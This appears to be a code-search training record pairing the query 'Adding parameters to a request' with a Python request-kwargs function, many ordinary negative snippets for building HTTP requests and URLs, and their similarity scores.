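        return template.format(**params)
    except KeyError:
        required = set(re.findall(r"{(\w+)}", template))
        missing = required - set(params)
        raise TypeError(
            "{}() missing {} required url params: '{}'".format(
                resource, len(missing), "', '".join(sorted(missing))
            )
        )


url = fill_url_template(
    "https://api.example.com/users/{user_id}/repos/{repo}",
    {"user_id": "42", "repo": "demo"},
)
print(url)  # https://api.example.com/users/42/repos/demo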
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _create_request_url():\n url = 'http'\n if _config['save']:\n url += 's'\n url += '://{}:{}/move'.format(_config['ip'], _config['port'])\n return url", "def _CreateRequest(self, url, data=None):\r\n logging.debug(\"Creating request for: '%s' with payload:\\n%s\", url, data)\r\n req = urllib2.Request(url, data=data, headers={\"Accept\": \"text/plain\"})\r\n if self.host_override:\r\n req.add_header(\"Host\", self.host_override)\r\n for key, value in self.extra_headers.iteritems():\r\n req.add_header(key, value)\r\n return req", "def _CreateRequest(self, url, data=None):\n logging.debug(\"Creating request for: '%s' with payload:\\n%s\", url, data)\n req = urllib2.Request(url, data=data)\n if self.host_override:\n req.add_header(\"Host\", self.host_override)\n for key, value in self.extra_headers.iteritems():\n req.add_header(key, value)\n return req", "def _make_url(self):\n ...", "def _build_request(self, endpoint='', **parameters):\n\n request = {\n 'method': parameters.pop('method', 'GET'),\n 'data': parameters.pop('data', None),\n 'json': parameters.pop('json', None)\n }\n\n # url = {base_url}[/{endpoint}]\n url = '/'.join(filter(None, (self.__class__.base_url, endpoint)))\n\n for index, (key, value) in enumerate(parameters.items()):\n url += '{symbol}{key}={value}'.format(\n symbol='&' if index else '?', key=key, value=value\n )\n\n request['url'] = url\n\n return request", "def urlfor( request, *args, **kwargs ):", "def build_request_url(symbol, start_date, end_date):\n pass", "def createRequest(test, url, headers=None):\n request = HTTPRequest(url=url)\n if headers: request.headers=headers\n test.record(request, HTTPRequest.getHttpMethodFilter())\n return request", "def request(self, url, *args, **kwargs):\n raise NotImplementedError", "def toHTTPRequest(self):\n query = {}\n if (not self.getValues() == None):\n values = self.getValues()\n for key, value in values.iteritems():\n query[key[0].upper() + key[1 : len(key)]] = value\n\n if (self.getMethod() == 'GET'):\n request = UrlLibRequest(self.getUrl() + urlencode(query))\n else:\n request = UrlLibRequest(self.getUrl(), urlencode(query))\n\n request.add_header('Accept-Encoding', 'gzip, deflate')\n\n return request", "def _build_request_url(self, params, kwargs, post=False):\n if post:\n return '%s%s' % (self.endpoint, self.methodname)\n else:\n return '%s%s?%s' % (self.endpoint, self.methodname, kwargs)", "def __call__(self, request):\n if self.where == \"qs\":\n parts = urlparse(request.url)\n qs = parse_qs(parts.query)\n qs[self.qs_key] = self.token\n request.url = urlunparse(\n (\n parts.scheme,\n parts.netloc,\n parts.path,\n parts.params,\n urlencode(qs),\n parts.fragment,\n )\n )\n elif self.where == \"header\":\n request.headers[\"Authorization\"] = \"Bearer {}\".format(self.token)\n return request", "def new_request(self, **kwargs):\n url = self.config[\"base_url\"]\n\n if kwargs.get(\"user_id\") is not None:\n url = url + kwargs[\"user_id\"]\n\n self.req = request.Request(host=self.config[\"host\"], protocol=constant.HTTP, url=url,\n method=kwargs[\"method\"], time_out=kwargs[\"timeout\"])\n\n return self", "def _build_request_url(self, params, kwargs, post=False):\n if post:\n return '%s?method=%s&type=%s' % (self.endpoint, self.methodname, params.get('type', 'json'))\n else:\n return '%s?%s' % (self.endpoint, kwargs)", "def _prepare_url(self):\n\n base_url = '{}://{}{}'.format(\n self.client.protocol, self.client.base_url, self.api_path\n )\n url_parts = '/'.join(\n [part for part in 
self.parameters[constants.RequestConst.PATH]]\n )\n\n if url_parts:\n final_url = '{}/{}'.format(base_url, url_parts)\n else:\n final_url = base_url\n\n if self.method == constants.RequestConst.GET:\n params = self.parameters[constants.RequestConst.QUERY]\n for param, value in params.items():\n if isinstance(value, list):\n params[param] = ','.join(value)\n elif isinstance(value, dict):\n params[param] = ','.join([f'{k}:{v}' for k, v in value])\n\n url_query = '?' + '&'.join([f'{k}={v}' for k, v in params.items()])\n final_url = '{}{}'.format(final_url, url_query)\n\n self.debug.ok('final url', final_url)\n\n return final_url", "def buildRequest(self, uri):\r\n req = urllib2.Request(uri)\r\n req.add_header('X-CSRFToken', self.token)\r\n req.add_header('Referer', 'http://www.ingress.com/intel')\r\n req.add_header('Accept-Charset', 'utf-8')\r\n req.add_header('User-agent', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31')\r\n return req", "def _build_api_request_uri(self, http_method=\"GET\"):\n return self.urlobject_single.format(self._cb.credentials.org_key, self._model_unique_id)", "def _build_api_request_uri(self, http_method=\"GET\"):\n return self.urlobject_single.format(self._cb.credentials.org_key, self._model_unique_id)", "def make_request(self, url, action, data='', status_code='', parser=None):\n self._url = self.get_api_path(url)\n headers = {\n 'Content-Type': \"application/json\",\n 'Token': self.token,\n\n }\n kwargs = {}\n if headers:\n kwargs.update(headers=headers)\n if data:\n kwargs.update(data=json.dumps(data))\n\n return getattr(self.http, action.lower())(self._url, **kwargs)", "def _make_request(self, url: str, parameters: dict = None,\n method: str = 'GET', *args, **kwargs):\n response = requests.request(\n method=method,\n url=build_url(\n self.BASE_API_URL, url, parameters\n ),\n headers={\n 'Authorization': 'Bearer {}'.format(self._access_token)\n }, **kwargs\n )\n if response.ok:\n return response.json()\n raise MondoApiException(response.json()['message'])", "def request(self, url, data=None, params={}, files=None):\n params['token'] = self.token\n request = self.make_request(url, data=data, params=params, files=files)\n return request", "def build_request(input_id, method, params=None):\n request = {\"method\": method, \"id\": input_id}\n if params is not None:\n request[\"params\"] = params\n return request", "def request(query):", "def url(request):\n URL = namedtuple('URL', ['mainnet', 'testnet'])\n\n # For actual trading and market data, the mainnet URL will be used:\n # When developing application, the testnet URL should be used:\n url = URL(mainnet=\"https://api.switcheo.network/v2/\", testnet=\"https://test-api.switcheo.network/v2/\")\n\n def tear_down():\n # clean up here\n pass\n\n request.addfinalizer(tear_down)\n return url", "def build_url(self, request, action, **query):\n base = urlparse.urljoin(request['base_url'], self.auth_prefix + '/' + action)\n return appendArgs(base, query)", "def create_request(url, headers, attempts, request_type, data=None):\n request_func = getattr(requests, request_type)\n kwargs = {\"url\": url, \"headers\": headers}\n if request_type == \"post\" or request_type == \"patch\":\n kwargs[\"json\"] = data\n try:\n req = request_func(**kwargs)\n status_code = req.status_code\n time.sleep(1)\n while status_code >= 400 and attempts < 5:\n req = request_func(**kwargs)\n status_code = req.status_code\n attempts += 1\n time.sleep(1)\n return req\n except Exception as 
e:\n print(\"[ERROR] There was an error with the request, details:\")\n print(e)\n return None", "def construct_url(self,*path):\n base = self.request.protocol+\"://\"+self.request.host+\"/\"\n return base+\"/\".join(path)", "def _url_builder(url_root,api_key,path,params):\n params['api_key'] = api_key\n url_end = urlencode(params)\n url = \"%s%s%s\" % (url_root,path,url_end)\n return url", "def _request(url, data=None):\n if data:\n req = urllib.request.Request(\n url,\n json.dumps(data).encode(\"utf-8\"),\n {\n \"X-Starfighter-Authorization\": _KEY,\n \"accept-encoding\": \"gzip\",\n \"content-type\": \"application/json\"\n }\n )\n else:\n req = urllib.request.Request(url)\n return req", "def to_httpx_request(cls, **kwargs):\n request = kwargs[\"request\"]\n raw_url = (\n request.url.scheme,\n request.url.host,\n request.url.port,\n request.url.target,\n )\n return httpx.Request(\n request.method,\n parse_url(raw_url),\n headers=request.headers,\n stream=request.stream,\n extensions=request.extensions,\n )", "def request(self, method, url, *args, **kwargs):\n full_url = urljoin(self.base_url, url)\n if 'data' in kwargs:\n kwargs['data'] = self._encode_data(kwargs['data'])\n return super(Client, self).request(method, full_url, *args, **kwargs)", "def _submit_url(self, url_part, params=None, headers=None, request_method=get_url):\n\n token_params = [('token', self.login())]\n if params:\n\n # loop through parameters\n for item in params.items():\n\n # separate lists into tuples\n if isinstance(item[1], list):\n for v in item[1]:\n token_params.append((item[0], v))\n else:\n token_params.append(item)\n\n # Check if the url_part contains the datasource location\n url = url_part\n if not url_part.startswith(self.datasource.location):\n url = f'{self.datasource.location}{url_part}'\n\n return request_method(url, params=token_params,\n headers=headers, verify=self.verify_ssl)", "def _generate_url(action, query_params=None):\r\n if query_params:\r\n query_params = urllib.parse.urlencode(query_params)\r\n action = f\"{action}?{query_params}\"\r\n \r\n\r\n url = urllib.parse.urljoin(api_url, action)\r\n\r\n return url", "def build_request(self, theurl, fields, files, txheaders=None):\n\n content_type, body = self.encode_multipart_formdata(fields, files)\n if not txheaders: txheaders = {}\n txheaders['Content-type'] = content_type\n txheaders['Content-length'] = str(len(body))\n\n return urllib2.Request(theurl, body, txheaders)", "def __init__(self, request):\n self.arguments = {}\n for k, v in request.GET.items():\n self.arguments.setdefault(k, []).append(v)\n\n self.full_url = lambda: request.url\n self.host = request.host\n self.path = request.path", "def createRequest(self, **kwargs):\n for k,v in kwargs.items():\n self.request[\"content\"][k] = v\n \n return self.request", "def _make_request(self, method: str, params: Dict) -> Dict:\n\n # Define a new session.\n request_session = requests.Session()\n request_session.verify = True\n\n # Define a new request.\n request_request = requests.Request(\n method=method.upper(),\n url=self.bea_url,\n params=params\n ).prepare()\n\n # Send the request.\n response: requests.Response = request_session.send(\n request=request_request\n )\n\n # Close the Session\n request_session.close()\n\n print(response.url)\n\n # If the response is OK then return it.\n if response.ok and self._format == 'JSON':\n return response.json()\n elif response.ok and self._format == 'XML':\n return response.text\n else:\n raise requests.ConnectionError()", "def build_request(url, 
headers, body, initial_request: Request) -> Request:\n updated_request = Request(\n method=initial_request.method,\n url=url,\n headers=headers,\n content=body\n )\n\n if hasattr(initial_request, 'extensions'):\n updated_request.extensions = initial_request.extensions\n\n return updated_request", "def construct_url(self):\n path = [self.path]\n path.extend([str(x) for x in self.params])\n\n url = self.client.base_url + '/'.join(x for x in path if x)\n query = self.kwargs.get('query')\n\n if query:\n # Dict -> List\n if type(query) is dict:\n query = query.items()\n\n # Remove items with `None` value\n query = [\n (k, v) for (k, v) in query\n if v is not None\n ]\n\n # Encode query, append to URL\n url += '?' + urlencode(query)\n\n return url", "def sendCreateRequest(self, url:str, originator:str, ty:T=None, data:Any=None, parameters:Parameters=None, ct:ContentSerializationType=None, targetResource:Resource=None) -> Result:\n\t\tif Utils.isHttpUrl(url):\n\t\t\tCSE.event.httpSendCreate() # type: ignore\n\t\t\treturn CSE.httpServer.sendHttpRequest(requests.post, url, originator, ty, data, parameters=parameters, ct=ct, targetResource=targetResource)\n\t\tLogging.logWarn(dbg := f'unsupported url scheme: {url}')\n\t\treturn Result(status=True, rsc=RC.badRequest, dbg=dbg)", "def __http_build_url(self, url_path):\n\n return '{}://{}{}'.format(_GOVEE_API_PROTOCOL, _GOVEE_API_HOST, url_path)", "def url():\n ...", "def request_url(request):\n \n shot = request.GET['shot']\n path = request.GET['path']\n tree = request.GET['tree']\n\n xml_elmt = '{http://h1svr.anu.edu.au/}dataurlmap'\n lang_attr = {'{http://www.w3.org/XML/1998/namespace}lang': 'en'}\n url_xml = etree.Element(xml_elmt, attrib=lang_attr)\n \n shot_number = etree.SubElement(url_xml, 'shot_number', attrib={})\n shot_number.text = shot\n data_path = etree.SubElement(url_xml, 'path', attrib={})\n data_path.text = path\n data_tree = etree.SubElement(url_xml, 'tree', attrib={})\n data_tree.text = tree\n\n url_processor = URLProcessor(shot=int(shot), tree=tree, path=path)\n url = url_processor.get_url()\n url_el = etree.SubElement(url_xml, 'url', attrib={})\n url_el.text = url\n\n return HttpResponse(etree.tostring(url_xml),\n mimetype='text/xml; charset=utf-8')", "def __init__(self, url, method=\"GET\", params=None):\n self.url = url\n self.method = method\n self.params = params", "def create_request(params={}, path='/', method='POST'):\n request = DummyRequest(path)\n request.method = method\n request.args = params\n return request", "def __call__(self, requestStr):\n return self.connection.Request(requestStr)", "def __init__( httpconn, method, uri, uriparts, version, headers ):", "def strReq(url, data):\n return requests.Request('GET', url, params=data).prepare().url", "def __init__( request ):", "def req():\n return Request()", "def build_http_request(method: bytes, url: bytes,\n protocol_version: bytes = HTTP_1_1,\n headers: Optional[Dict[bytes, bytes]] = None,\n body: Optional[bytes] = None) -> bytes:\n if headers is None:\n headers = {}\n return build_http_pkt(\n [method, url, protocol_version], headers, body)", "def test_url_is_constructed_as_expected(self):\n t = ConfigurableDatasetRequest('SomeCoolSet',\n dataset_format=\"json\",\n params=dict(subjectid='45838',\n locale='eng',\n app_instance_uuid='1234'))\n self.assertEqual(Url('datasets/SomeCoolSet.json?subjectid=45838&'\n 'locale=eng&'\n 'app_instance_uuid=1234'), Url(t.url_path()))", "def _prepare(self, url):\n pass", "def _make_request(self, method, url, post_data=None, 
body=None):\r\n if not self.connection:\r\n self._connect()\r\n try:\r\n self.connection.close()\r\n except:\r\n pass\r\n self.connection.connect()\r\n headers = {}\r\n if self.auth_header:\r\n headers[\"Authorization\"] = self.auth_header\r\n self.connection.request(method, url, body, headers)\r\n resp = self.connection.getresponse()\r\n return resp", "def __init__(self, *segments, **params):\n self.url = URL(*segments, **params)", "def make_req_url(user, repo, endpoint, limit=50, queries=None):\n url = \"%s%s/%s/%s\" % (API_BASE_URL, user, repo, endpoint)\n\n # Set limit is given and is above 50, set limit to 50\n if limit and limit > 50:\n limit = 50\n url += \"?limit=%d\" % limit\n\n # Add additional query parameters\n if queries:\n for key in queries:\n url += \"&%s=%s\" % (key, queries[key])\n return url", "def url(self):\n ...", "def request(self, verb, url, payload: Optional[Any] = ..., multipart: Optional[Any] = ...):\n ...", "def _build_request(self, service, indicator_type, risk_rule: Optional[str] = None) -> requests.PreparedRequest:\n if service == 'connectApi':\n if risk_rule:\n url = self.BASE_URL + indicator_type + '/risklist?list=' + risk_rule\n else:\n url = self.BASE_URL + indicator_type + '/risklist'\n\n params = self.PARAMS\n params['gzip'] = True\n\n response = requests.Request(\n 'GET',\n url,\n headers=self.headers,\n params=params\n )\n\n elif service == 'fusion':\n url = self.BASE_URL + 'fusion/files/?path='\n if self.fusion_file_path is None:\n fusion_path = '/public/risklists/default_' + indicator_type + '_risklist.csv'\n else:\n fusion_path = self.fusion_file_path\n\n fusion_path = urllib.parse.quote_plus(fusion_path)\n response = requests.Request('GET',\n url + fusion_path,\n headers=self.headers,\n params=self.PARAMS)\n else:\n raise DemistoException(f'Service unknown: {service}')\n return response.prepare()", "def newRequest(self):\n return Request( )", "def _make_request(self, method, url, post_data=None, body=None):\n if not self.connection:\n self._connect()\n try:\n self.connection.close()\n except:\n pass\n self.connection.connect()\n headers = {}\n if self.auth_header:\n headers[\"Authorization\"] = self.auth_header\n self.connection.request(method, url, body, headers)\n resp = self.connection.getresponse()\n return resp", "def build_http_request(method: bytes, url: bytes,\n protocol_version: bytes = b'HTTP/1.1',\n headers: Optional[Dict[bytes, bytes]] = None,\n body: Optional[bytes] = None) -> bytes:\n if headers is None:\n headers = {}\n return build_http_pkt(\n [method, url, protocol_version], headers, body)", "def _make_request(self):\n response = urllib2.urlopen(\n url=self.api_url,\n data=self._get_request_data()\n )\n content = response.read()\n return json.loads(content.decode('utf8'))", "def requestURL(userID): #@NoSelf", "def _get_request(url, params):\n request = requests.get(url, params=params)\n\n return request", "def make_request(self, environ, **kwargs):\n factory = self.get(abcs.ARequest)\n request = factory(environ, self, **kwargs)\n self._set_request_attributes(request)\n return request", "def create(self, obj):\r\n request = http.Request('POST', self.get_url(), self.wrap_object(obj))\r\n\r\n return request, parsers.parse_json", "def createHttpRequest(self, endpoint, payload=None, method=None, xDepth=None):\n\n logger.debug(\"Endpoint: {}\".format(endpoint))\n\n if endpoint is None:\n raise TypeError(\"expected CIC endpoint url but received None\",\"CIC_WRONG_ARGUMENT_TYPE_ERR\")\n\n # if no playload provided always do HTTP GET by 
default\n if payload is None:\n logger.debug(\"Preparing HTTP GET\")\n request = urllib2.Request(self.cicUrl+endpoint)\n\n elif ((payload is not None) and (method == \"POST\")):\n logger.debug(\"Preparing HTTP Post\")\n data = json.dumps(payload)\n request = urllib2.Request(self.cicUrl+endpoint,data, {'Content-Type': 'application/json'})\n request.get_method = lambda: 'POST'\n\n elif ((payload is not None) or (method==\"PATCH\")):\n logger.debug(\"Preparing HTTP Patch\")\n data = urllib.urlencode(payload)\n request = urllib2.Request(self.cicUrl+endpoint,data)\n request.get_method = lambda: 'PATCH'\n\n if xDepth:\n request.add_header(\"X-Depth\", xDepth)\n\n return request", "def query(url):", "def create_request_url(title):\n q_string = title.replace(' ', '+')\n return f\"https://google-search3.p.rapidapi.com/api/v1/search/q={q_string}num=2\"", "def new_url(module):\n # To create the URL, we need to take the format string and return it with no params\n url_base = \"/axapi/v3/ddos/template/tcp\"\n\n f_dict = {}\n f_dict[\"name\"] = \"\"\n\n return url_base.format(**f_dict)", "def request(self, method: str, url: str, **kwargs) -> requests.Response:\n url = parse.urljoin(self.http_address, url)\n return requests.request(method, url, **kwargs)", "def make_request(self, request_type: RequestTypes, payload: dict, url_extras: [str] = []) -> json:\n s = requests.Session()\n s.headers.update({\n \"Authorization\": \"Bearer %s\" % self.access_token,\n \"Content-Type\": \"application/json\"\n })\n url = self.url_base + self.get_url_end_string(url_extras)\n #print(url)\n if request_type == RequestTypes.POST:\n response = s.post(url, json=payload)\n elif request_type == RequestTypes.GET:\n response = s.get(url, json=payload)\n else:\n print(\"ERROR: '\" + request_type + \"' is not a valid request type\")\n exit(1)\n response_json = response.json()\n self.validate_response(response_json)\n return response_json", "def url(self, request_path=\"\"):\n return f\"{self.scheme}://{self.host}/{request_path}\"", "def make_request(action, r_addr, l_addr, data=None, token=None):\n return {\n 'action': action,\n 'time': time(),\n 'data': data,\n 'token': token,\n 'address': {\n 'remote': { # TODO: переименовать в IP\n 'addr': r_addr.addr,\n 'port': r_addr.port,\n },\n 'local': { # TODO: переименовать в MAC и передавать MAC\n 'addr': l_addr.addr,\n 'port': l_addr.port,\n },\n },\n }", "def _request(self, method, url, payload=None, **params):\n kwargs = dict(params=params)\n kwargs[\"timeout\"] = self._timeout\n if not url.startswith('http'):\n url = self.prefix + url\n headers = self._auth_headers()\n headers['Content-Type'] = 'application/json'\n\n if payload:\n kwargs[\"data\"] = json.dumps(payload)\n gs = self._gpool.spawn if self._gpool else gevent.spawn\n r = gs(self.session.request, method, url, headers=headers, **kwargs)\n r.fetch = partial(self.join, r)\n update_wrapper(r.fetch, self.join)\n #gevent.sleep(0.05)\n return r", "def __init__(self):\n self._url = \"\"\n self._verb = VERBS.GET\n self._params = {}\n self._data = {}", "def do_request(self, url, in_data=None, in_file_dict=None):\n url_string=url\n logger.debug(\n \"do_request request string: {string}\".format(string=url_string)\n )\n response=requests.post(\n url_string,\n data=in_data,\n files=in_file_dict,\n cookies=self.cookies #For Authentication!\n )\n return response", "def create(cls, request):\n if isinstance(request, Request):\n request = request.prepare()\n\n # Method\n method = request.method.lower()\n\n # Cookies\n cookie = {}\n if 
request._cookies is not None:\n # cookies are stored in a cookiejar object\n cookie = request._cookies.get_dict()\n\n # Preparing a request formats the URL with params, strip them out again\n o = urlparse(request.url)\n params = parse_qs(o.query)\n # extract the URL without query parameters\n url = o._replace(query=None).geturl()\n\n # Order matters because all python requests issued from a session\n # include Accept */* which does not necessarily match the content type\n mimetype = request.headers.get(\"Content-Type\") or request.headers.get(\n \"Accept\"\n )\n\n # Headers - request.headers is not an instance of Headers\n # which is expected\n header = Headers(dict(request.headers))\n\n # Body\n # TODO: figure out if request._body_position is relevant\n body = request.body\n\n # Path gets deduced by path finder against spec\n parameters = RequestParameters(\n query=ImmutableMultiDict(params),\n header=header,\n cookie=cookie,\n )\n return OpenAPIRequest(\n full_url_pattern=url,\n method=method,\n parameters=parameters,\n body=body,\n mimetype=mimetype,\n )", "def __init__(self, url):\n self.url = url\n self.admin_url = os.path.join(url, \"__admin\")\n self.admin_mapping_url = os.path.join(self.admin_url, \"mappings\")\n self.mapping_reset_url = os.path.join(self.admin_mapping_url, 'reset')\n self.requests_url = \"%s/requests\" % self.admin_url", "def createRequest(self):\n self.get_bmc_website()\n self.__createChangeRequest = Create(self.browser)\n self.__createChangeRequest.createNCR()", "def __init__(self, url):\n\t\tself._url = url", "def __init__(self, url, type):\n self.url = url\n self.type = type", "def create():\n link_user = request.cookies.get('linkuser')\n user_browser = request.user_agent.browser\n time_stamp = datetime.now()\n action = \"create\" ## create or autocreate? 
add a request param.\n lat = request.form['lat']\n longitude = request.form['long'] \n\n if request.method == 'POST':\n url = request.form['url']\n short = request.form['short']\n\n ## add http:// if not in url\n if url.find('http://') == -1: \n app.logger.debug(\"adding http://\")\n url = 'http://' + url\n\t\n ## log user action\n logline = [str(time_stamp), link_user, user_browser, action, url, short, lat, longitude ]\n app.logger.debug(logline)\n write_log(logline)\t\n\n ## check if url in db\n for shortDB, urlDB in db.items():\n if url == urlDB or url[:7] +'www.'+ url[7:] == urlDB:\n short = shortDB\n app.logger.debug(url+\" already stored at \"+ short)\n return jsonify(url=url,short=short,link=\"http://people.ischool.berkeley.edu/~arenold/server/\"+short)\n\t\t\n\t\t## store new short and url\n app.logger.debug(\"request to store new \"+url+\" at \"+short)\n clicks[str(short)] = 0 \n db[str(short)] = str(url)\n\t\n return jsonify(url=url,short=short,link=\"http://people.ischool.berkeley.edu/~arenold/server/\"+short)", "def get_url(self, **kwargs):\n\n return build(\n self._request.path,\n self._request.GET,\n self._meta.prefix,\n **kwargs )", "def make_request_from_data(self, data):\n data = json.loads(data)\n must_have_keys = ('url',)\n self._check_data_keys(must_have_keys, data)\n url = data.pop('url', )\n self.headers = {\n \"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 \"\n \"(KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36\"\n }\n return scrapy.Request(\n url,\n callback=self.parse,\n meta={'extra_data': data},\n dont_filter=True,\n headers=self.headers\n )", "def url_for_request(self, method, extras):\n raise NotImplementedError(\"Should be overriden by subclass\")", "def make_url(site,node,instrument,method,stream,API_USERNAME,API_TOKEN):\n\n SENSOR_BASE_URL = 'https://ooinet.oceanobservatories.org/api/m2m/12576/sensor/inv/'\n VOCAB_BASE_URL = 'https://ooinet.oceanobservatories.org/api/m2m/12586/vocab/inv'\n meta_request_url ='/'.join((VOCAB_BASE_URL,site,node,instrument)) # Python wizard best\n data_request_url ='/'.join((SENSOR_BASE_URL,site,node,instrument,method,stream))\n\n # Retrieve vocabulary information for a given instrument\n r = requests.get(meta_request_url, auth=(API_USERNAME, API_TOKEN))\n meta_data = r.json()\n\n return (data_request_url,meta_data)", "def _GenHttpRequestProto(self):\n request = jobs_pb2.HttpRequest()\n request.source_ip = \"127.0.0.1\"\n request.user_agent = \"Firefox or something\"\n request.url = \"http://test.com/test?omg=11%45x%20%20\"\n request.user = \"anonymous\"\n request.timestamp = int(time.time() * 1e6)\n request.size = 1000\n return request", "def create() -> TJsonResponse:\n if request.headers['Content-Type'] == 'application/json':\n url = request.json.get('url')\n else:\n url = request.form.get('url')\n if not url:\n return jsonify(error='bad request'), 400\n result = scrape.scrape_meta_for_url(url)\n inserted_id, tags = result.get()\n url_hash = encode(inserted_id)\n response_body: Dict[str, Any] = jsonify(hash=url_hash, short_url=f'https://fanlens.io/@{url_hash}', tags=tags)\n return response_body", "def _generate_url(self, **kwargs):\n path = self.url_path.format(**kwargs)\n return self.poolbot.generate_url(path)", "def urlpath( request, *args, **kwargs ):", "def _get_request(url_root,api_key,path,response_type,params, ssl_verify):\n url = _url_builder(url_root,api_key,path,params)\n content = _fetch(url, ssl_verify)\n response = _dispatch(response_type)(content)\n return response", "def 
_request(self, url: str) -> http.client.HTTPResponse:\n self.request = urllib.request.Request(\n url,\n headers={'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)'})\n try:\n return urllib.request.urlopen(self.request, timeout=10)\n except Exception as e:\n # print(e)\n # exit(-1)\n print(e, url)\n raise e", "def create_short_url():\n if request.method == 'POST':\n if 'url' in request.args:\n og_url = request.args['url']\n\n if url_check(og_url) is True:\n if 'custom' in request.args:\n token_string = request.args['custom']\n if 'tag' in request.args:\n tag_url = request.args['tag']\n else:\n tag_url = ''\n else:\n token_string = random_token()\n\n if 'tag' in request.args:\n tag_url = request.args['tag']\n else:\n tag_url = ''\n\n conn = psycopg2.connect(host=host, user=user, password=passwrd, database=db)\n cursor = conn.cursor()\n check_row = \"SELECT S_URL FROM WEB_URL WHERE S_URL = %s FOR UPDATE\"\n cursor.execute(check_row, (token_string,))\n check_fetch = cursor.fetchone()\n\n if check_fetch is None:\n insert_row = \"\"\"\n\t\t\t\t\t\tINSERT INTO WEB_URL(URL , S_URL , TAG) VALUES( %s, %s , %s)\n\t\t\t\t\t\t\"\"\"\n\n cursor.execute(insert_row, (og_url, token_string, tag_url,))\n\n conn.commit()\n conn.close()\n\n short_url = shorty_host + token_string\n long_url = og_url\n data = jsonify({\n 'long_url': og_url,\n 'short_url': short_url,\n 'custom': token_string,\n 'tag': tag_url\n })\n\n return make_response(data, 200)\n else:\n data = jsonify({'error': 'suffix already present'})\n return make_response(data, 200)\n else:\n data = jsonify({'error': 'URL given is not valid . Enter a valid URL.'})\n return make_response(data, 200)\n else:\n data = jsonify({'error': 'invalid request'})\n return make_response(data, 405)\n else:\n data = jsonify({'error': 'Invalid Method Used'})\n return make_response(data, 405)", "def request_factory(environ):\n request = Request(environ)\n _LOG.debug('trunctated request body: {b}'.format(b=request.body[:1000]))\n return request", "def get_request(url):\n\tr = requests.get(url)\n\treturn(r)", "def requests_request_factory(method, endpoint, urlargs, data, is_json, headers,\n files, verify_ssl):\n client_func = getattr(requests, method.lower())\n\n if headers is None:\n headers = [('Content-Type', 'application/json')] if is_json else []\n\n if data is not None:\n request_args = dict(\n data=json.dumps(data) if is_json else data,\n headers=dict(headers),\n )\n else:\n request_args = {}\n\n if files is not None:\n request_args['files'] = files\n\n return client_func(\n url_for(\n endpoint,\n _external=True,\n _scheme='https',\n **urlargs\n ),\n verify=verify_ssl,\n **request_args\n )", "def __init__(self, request: object) -> None:\n super().__init__({}, request, URL, Api)", "def generate_call_string(self):\n if(self.api_key is None):\n raise error(\"API Key is not defined\");#Should base class do this? \n \n self.call_url=self.baseurl;\n if hasattr(self,'search_str'):\n self.call_url+=self.search_str;\n if hasattr(self,'filter_field_str'):\n self.call_url=self.call_url+'&'+self.filter_field_str;\n \n #loop over the parameters dict\n for key in self.input_params:\n self.call_url+=self.input_params[key];\n \n #finally add api key. 
at this point already checked it exists\n self.call_url=self.call_url+'&'+\"api-key=\"+str(self.api_key);\n return;", "def _make_request(self):\n try:\n self.response = requests.request(\n method=self.method,\n url=self.url,\n params=self.params,\n data=self.data,\n )\n\n logger.debug(f\"Request URL: {self.response.url}\")\n\n self.response.raise_for_status()\n\n # wrap all `requests` library error and serve as custom application error\n except RequestException as e:\n logger.error(e.__str__(), exc_info=True)\n raise ExternalAPIError(\n \"Error while communication with External API\"\n )" ]
[ "0.7095145", "0.70785993", "0.7020341", "0.69661885", "0.6836974", "0.67563176", "0.6740314", "0.6718406", "0.6607577", "0.6582395", "0.65728194", "0.65544945", "0.6512967", "0.6509939", "0.6411456", "0.6373932", "0.63712084", "0.63712084", "0.6340278", "0.62835985", "0.6275929", "0.6239781", "0.6228785", "0.62185687", "0.6202315", "0.62002295", "0.61977345", "0.61963046", "0.617654", "0.61751", "0.6171625", "0.6169888", "0.61685765", "0.6168387", "0.6167578", "0.61653703", "0.6162668", "0.6140773", "0.613641", "0.61252606", "0.6103968", "0.60960615", "0.6087475", "0.60845524", "0.60336804", "0.6029318", "0.6025006", "0.6019441", "0.6013315", "0.59920657", "0.59917516", "0.59870833", "0.5984618", "0.5950742", "0.5941145", "0.5936102", "0.59274983", "0.5923617", "0.59198415", "0.59191024", "0.59139913", "0.59034216", "0.5899883", "0.5897906", "0.58949405", "0.58876336", "0.58848464", "0.58829737", "0.58696765", "0.5868804", "0.5868199", "0.58629954", "0.5862966", "0.5861373", "0.58468056", "0.5844509", "0.58426625", "0.5840703", "0.58359295", "0.5809798", "0.5799212", "0.57970035", "0.5794672", "0.5793703", "0.5790249", "0.57900816", "0.57883245", "0.57874936", "0.5783161", "0.57804614", "0.577019", "0.57684237", "0.57639164", "0.5761018", "0.5750315", "0.57498676", "0.57465774", "0.57445735", "0.5741615", "0.5736414", "0.57351124" ]
0.0
-1
Adding parameters to a request
def get_request_kwargs(self, api_params, *args, **kwargs): serialized = self.serialize_data(kwargs.get("data")) kwargs["data"] = self.format_data_to_request(serialized) return kwargs
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def add_params(self, params: t.Mapping[str, str]) -> 'Request':\n return replace(self, params={**self.params, **params})", "def additional_access_token_request_parameters(self, parameters, request):", "def get_request_extra_params(self, **kwargs):\n params = self.request_extra_params.copy()\n params.update(kwargs)\n return params", "def _build_param_request(self):\n search_params = []\n for param in self.params:\n # print(param)\n if self.params[param] is not None:\n search_params.append(param + '={}'.format(self.params[param]))\n search_params = '&' + '&'.join(search_params)\n return search_params", "def _params(self, request: Request) -> dict:\n params = {'forceAsync': True}\n\n subset = self._spatial_subset_params(request) + self._temporal_subset_params(request)\n if len(subset) > 0:\n params['subset'] = subset\n\n for p, val in request.parameter_values():\n if type(val) == str:\n params[p] = val\n elif type(val) == bool:\n params[p] = str(val).lower()\n elif type(val) == list and type(val[0]) != str:\n params[p] = ','.join([str(v) for v in val])\n else:\n params[p] = val\n\n return params", "def add_params(self, params):\n return self.set_param('params', params)", "def createRequest(self, **kwargs):\n for k,v in kwargs.items():\n self.request[\"content\"][k] = v\n \n return self.request", "def build_request(input_id, method, params=None):\n request = {\"method\": method, \"id\": input_id}\n if params is not None:\n request[\"params\"] 